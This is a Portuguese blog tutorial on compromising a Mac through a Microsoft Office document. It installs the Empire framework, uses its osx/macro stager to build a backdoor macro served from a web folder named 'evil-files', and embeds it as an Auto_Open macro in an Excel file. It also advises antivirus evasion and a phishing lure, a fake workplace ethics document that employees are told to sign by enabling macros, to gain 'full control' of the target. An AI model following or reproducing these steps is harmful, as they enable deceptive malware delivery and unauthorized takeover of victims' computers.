Hackeando Mac usando um documento do Microsoft Office


Nesse artigo vou demonstrar como podemos utilizar um arquivo do Office Oficial e verdadeiro e embutir um Backdoor nele


Criando Backdoor

Ou siga esses passos:

A maioria de nós já ouviu falar de msfvenom ou ou pelo menos backdoors Metasploit, eles são grandes, mas eles são detectados por programas antivírus, também sabemos que podemos usar uma ferramenta chamada VeilEvasion como explico em outro post para gerar backdoors que ignoram a maioria dos programas anti-vírus , a eficácia de tais ferramentas depende de quão recentemente, eles foram atualizados,portanto, às vezes Veil irá gerar backdoors que vai ser detectados por vários programas de AV, a maneira de corrigir isso é modificar o backdoor manualmente para torná-lo mais original (este é um completamente tópico diferente, alternativamente, você pode apenas tentar gerar o backdoor usando outra ferramenta, como Empire.
Empire não vem pré-instalado no Kali, siga estes passos simples para instalá-lo:
1.Vá para o diretório / opt (opcional).
cd / opt
2. Clone o projeto do github.
git clone https://github.com/EmpireProject/Empire.git
3. Vá para seu diretório de instalação
Empire cd / setup
4. Execute o instalador
./install.sh
Aguarde até que o instalador ao fim, e então você pode executar a ferramenta de seu diretório em / opt / Império, então primeiro você terá que navegar até ele usando cd
cd / opt / Empire
Em seguida, execute-o
./empire
Agora a ferramenta iniciou e você pode utilizar ela para criar seu backdoor
Agora você está pronto para usar a ferramenta, verificação geral o seguinte vídeo para saber como usar a ferramenta em geral, como um exemplo, você vai aprender como gerar um windows backdoor que os programas anti-vírus de bypass e usar esse backdoor para hackear o Windows 10 .

Gerando um Macro

Para gerar um macro vamos usar o comando do empire
userstager

Se quisermos criar para windows usamos windows/macro, porém para mac usaremos o comando

userstager osx/macro

Agora para termos mais informações o comando


info



set Listener http1
set Outfile /var/www/html/evil-files/osxMacro

Fazemos o comando info novamente para ver que está tudo atualizado

info

e iniciamos o backdoor

execute


Se formos em nosso server veremos o macro lá

Colocando o Macro no Office

Agora vamos ver como colocar ele no arquivo Office
Copiamos esse código, abrimos um Excel em branco
View - View Macros


Macro Name: Auto_Open
Macros in: Workbook1

Clique no +
Cole o código do Macro


Mude o nome de Workbook para Auto_Open

Agora pode acrescentar qualquer texto no arquivo para enviar ao alvo

Salvamos o Arquivo com qualquer nome com o formato em
Excel 97-2004


Clicando nele recebemos um aviso que tem um MACRO, o trabalho do penTester é convencer o alvo abrir os macros

Um bom exemplo é enviar um documento de "Regulamento de ética no trabalho" em que todos os funcionários precisam assinar e aceitar o macro para "reconhecer" a assinatura.

Recebemos controle total do Alvo

Comentários

Mais visitadas

Usando GPU para Brute-Force com HashCat

Ataque Evil Twin

XSS - Cross-site scripting

Man-in-the-Middle e MITMf - DNS Spoofing e suas defesas

Mitmproxy 1 - Conhecendo

Ataque pelo servidor - Metasploit - Nexpose